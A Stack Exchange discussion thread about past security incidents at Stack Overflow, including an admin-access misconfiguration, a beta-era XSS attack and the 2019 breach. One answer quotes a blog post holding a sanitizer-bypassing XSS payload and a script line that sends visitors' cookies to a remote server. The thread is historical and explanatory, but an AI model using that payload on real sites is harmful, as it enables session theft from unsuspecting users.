# Has anyone ever hacked Stack Overflow?

Tags: discussion, hacked

While chatting with friends about hacking, a guy said that *"if a site is getting popular/ or any competitive, it will somehow face severe hacks. Some used to expose it, others hide it".*

Out of curiosity I wanted to see if any such thing happened to Stack Overflow. Since Stack Exchange (being 5 years old) is the biggest network among professionals with more visitors, I started googling to find whether or not any hacks happened here. But I couldn't find such stories.

Though this question appears pretty non-constructive/off-topic, I would like to know if any hack has ever been attempted or exposed? Without having SSL, how are they maintaining/preventing hacks?

Comment: Jon Skeet hacked the site on day one, and we're living with it since.

Comment: In actual fact, the site started out as a place for Unicorn lovers to gather some 5 and a half years ago. This site got hacked and was "infected" with what we now refer to as a Q&A. It has never recovered.

Comment: or did the site hack Jon Skeet to get his awesomeness?

Comment: @UV-D, [Jon Skeet cannot be hacked](http://meta.stackexchange.com/questions/9134/jon-skeet-facts).

Comment: @FrédéricHamidi oh yes, I forgot - maybe one of his clones or minions?

Comment: In terms of someone getting admin access, in addition to ircmaxwell's post mentioned below there was [Jeff's "I Just Logged In as You" incident](http://www.codinghorror.com/blog/2009/05/i-just-logged-in-as-you.html). There have also been some XSS exploits, such as [this this one the beta (10k only)](http://stackoverflow.com/q/15347), and several others since. I've seen a couple less severe security vulnerabilities too. (Also during the beta, the lack of rate limiting was abused to mass-delete posts as "spam".) Fortunately, folks have been mostly-responsible about their findings.

Comment: Loosely related: [Implement the Hacker Badge](http://meta.stackexchange.com/q/122625/134300)

Comment: I hack Stack Overflow for a living, does it count?

Comment: It should be hacked without mercy.

Comment: Bwaaaahahahaha @Bart *dies laughing*

Comment: If they did they should have gone a lot further

Comment: followup question: "Can you help me do it too? I want to give myself the fanatic badge!"

Answer (score 74):

Yes, [ircmaxell](https://stackoverflow.com/users/338665/ircmaxell) hacked Stack Overflow once, although not intentionally.

Here's an excerpt from his follow up blog post, [Anatomy of an Attack: How I Hacked StackOverflow](http://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html):

> **The Vulnerability**
>
> If you're clever, you should be able to figure out what happened. But in case you didn't, here's how it went down. When I had my connection proxied through Squid, it added a X-Forwarded-For header. The value of this header was the IP of my source browser which made the request. But because of the SSH tunnel, the IP was localhost. To Squid, there was no difference between my browser and local. So it added X-Forwarded-For: 127.0.0.1...
>
> The really interesting part was what ASP was reporting. When they configured a page which would dump the raw request headers, my requests came through as Remote_Addr: 127.0.0.1!!! In their application, they were checking the correct header value. But IIS was misconfigured to rewrite Remote_Addr from X-Forwarded-For if it existed. So thanks to a misconfiguration, I was able to get admin access as easily as using my proxy.

As for larger scale attacks, [Nick Craver's answer](https://meta.stackexchange.com/a/129828/162704) on a [related question](https://meta.stackexchange.com/questions/129814/what-should-be-done-about-a-user-who-makes-a-threat) seems to suggest SE is ready to deal with them. Also, [SE's Sys-Admin team](https://meta.stackexchange.com/a/129816/162704) seems to be perfectly equipped for a wide variety of attacks, including a zombie apocalypse.

Now, if only we could find a way to end this (eternal) September...

Comment: For the record, based on how the SO team dealt with the vulnerability when I reported it to them, I have to say that I fully believe that they are more than ready and capable of handling any issue that happens. Seriously, they were *that* good with it...

Comment: @ircmaxell but you have major part in the good ending. Imagine someone... less responsible than yourself. He could cause major damage before a dev would have figured out what was going on. By the way, did you request a hacker badge? You surely deserve it!

Comment: @ShaWizDowArd: Fair enough. But I've reported a number of vulnerabilities to projects and sites alike, and SO's response was **BY FAR** the fastest, most professional and most complete. As far as requesting the hacker badge, nah. I'd love it. But I think that's the sort of thing that needs to be given, not asked for...

Answer (score 34):

[Shawn](https://stackoverflow.com/users/26/shawn) dropped an XSS attack waaaay back when the site was still in beta.

IIRC, he managed to log in as Jeff Atwood ([one of the site's co-founders](http://blog.codinghorror.com/introducing-stackoverflow-com/)) and run a script which upvoted EVERY post on the site.  He re-ran the script the next day to downvote every post as well.

In his defence, the site was in beta so we were all *supposed* to be trying to break it.  You can hear Jeff speak about this at 36:50 of [SO Podcast #37](https://blog.stackoverflow.com/2009/01/podcast-37/)

Jeff also wrote a [blog post](http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html) about the details of the exploit and the fix:

> Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
>
> `<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"`
>
> Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:
>
> `window.location="http://1.2.3.4:81/r.php?u="+document.links[1].text+"&l="+document.links[1]+"&c="+document.cookie;`
>
> That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!

Comment: Shawn has also mentioned in his profile.

Answer (score 31):

In addition to the other excellent answers, there’s also a [Stack Exchange Hall of Fame](https://stackexchange.com/about/security) where security researchers who responsibly disclosed a vulnerability to the site administrators get credited.

Answer (score 21):

[On May 16th 2019 it was revealed](https://stackoverflow.blog/2019/05/16/security-update/) that a hacker(s) managed to gain unauthorized access to Stack Overflow production systems on May 11th, 2019.

[A new post was issued on May 17th 2019](https://stackoverflow.blog/2019/05/17/update-to-security-incident-may-17-2019/?cb=1) to provide more information:

> The intrusion originated on May 5 when a build deployed to the development tier for stackoverflow.com contained a bug, which allowed an attacker to log in to our development tier as well as escalate their access on the production version of stackoverflow.com
>
> ... we have identified privileged web requests that the attacker made that could have returned IP address, names, or emails for a very small number of Stack Exchange users. ... our investigation suggests the requests in question affected approximately 250 public network users. Affected users will be notified by us.
>
> we maintain separate infrastructure and networks for clients of our Teams, Business, and Enterprise products and we have found no evidence that those systems or customer data were accessed. Our Advertising and Talent businesses were also not impacted.

Comment: FWIW one part/result of the hack was to gain network-wide moderator access (and employee access on some sites).

Comment: @MEEthesneakyuser Where did you get this info? Are there any official sources to link in the answer regarding this?

Comment: @Magisch no official sources unfortunately. I only saw a new user with network-wide mod rights and then later read a Tavern discussion about this and a message from an SE employee that they are investigating this. The user is now suspended network-wide instead of having mod rights. I could search for the Tavern discussion if you think that counts as official.

Comment: @MEEthesneakyuser Probably best to wait until the full incident report comes out and then quoting from that.

Comment: The latest update is explaining that some users' data _was_ accessed.

Comment: "*While our overall user database was not compromised, we have identified privileged web requests that the attacker made that could have returned IP address, names, or emails for a very small number of Stack Exchange users. Our team is currently reviewing these logs and will be providing appropriate notifications to any users who are impacted.*"; https://stackoverflow.blog/2019/05/17/update-to-security-incident-may-17-2019/?cb=1

Comment: "*We can now confirm that our investigation suggests the requests in question affected approximately 250 public network users. Affected users will be notified by us.*" - Their definition of 'small' and mine are at variance.

Comment: @Richard Compare that with Quora, another Q&A site that got hacked and ended up exposing the information for _millions_ of users.

Comment: @forest - I'm sure that'll be comforting to the hundreds of people whose account details were accessed.

Comment: @Richard Oh I'm not saying that it wasn't bad or that Stack Exchange isn't at least partially to blame, just that it _is_ small.

Comment: considering 250 even assuming 10 million accounts which is far outdated now is 0,0025%, I'd say thats small at this scale.

Comment: This was reported a few days ago on ZD Net: _[Stack Overflow says hackers breached production systems](https://www.zdnet.com/article/stack-overflow-says-hackers-breached-production-systems/)_

Comment: There is also a newer report: _[Stack Overflow hacker went undetected for a week](https://www.zdnet.com/article/stack-overflow-hacker-went-undetected-for-a-week/)_.